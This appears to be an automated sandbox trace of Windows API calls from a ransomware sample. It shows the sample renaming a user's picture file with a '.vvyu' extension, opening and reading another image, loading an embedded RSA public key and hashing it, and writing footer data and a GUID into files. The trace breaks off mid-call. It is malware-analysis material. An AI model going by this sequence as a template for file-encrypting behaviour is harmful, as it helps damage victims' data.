[0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.468] GetCurrentThreadId () returned 0x66c [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8868 [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.468] GetCurrentThreadId () returned 0x66c [0201.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34a0 [0201.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3500 [0201.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0201.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3518 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34b8 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3488 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0201.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0201.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fdf8 | out: hHeap=0x620000) returned 1 [0201.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.481] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x17ba6, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x17ba6, lpOverlapped=0x0) returned 1 [0201.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.483] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x17bab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.483] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.485] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.485] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.485] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.485] CloseHandle (hObject=0x510) returned 1 [0201.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0201.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0201.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0201.488] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\ksIF.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\ksif.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\ksIF.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\ksif.bmp.vvyu")) returned 1 [0201.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.489] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0201.492] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc06c0, ftCreationTime.dwHighDateTime=0x1d89e87, ftLastAccessTime.dwLowDateTime=0xd7050ba0, ftLastAccessTime.dwHighDateTime=0x1d89f03, ftLastWriteTime.dwLowDateTime=0xd7050ba0, ftLastWriteTime.dwHighDateTime=0x1d89f03, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PFZhNu297.png", cAlternateFileName="PFZHNU~1.PNG")) returned 1 [0201.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0201.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.493] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\PFZhNu297.png") returned=".png" [0201.493] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\PFZhNu297.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\pfzhnu297.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.494] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=2527) returned 1 [0201.494] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.497] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x9b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.497] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.499] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.499] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x9df, lpOverlapped=0x0) returned 1 [0201.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.499] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c278) returned 1 [0201.500] CryptCreateHash (in: hProv=0x67c278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.500] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.500] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.500] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.500] GetLastError () returned 0x0 [0201.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.501] GetLastError () returned 0x0 [0201.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.501] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.501] CryptReleaseContext (hProv=0x67c278, dwFlags=0x0) returned 1 [0201.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.502] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.502] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.502] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9e0) returned 0x2ea6a68 [0201.502] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fdf8 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fe40 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.503] RtlAllocateHeap 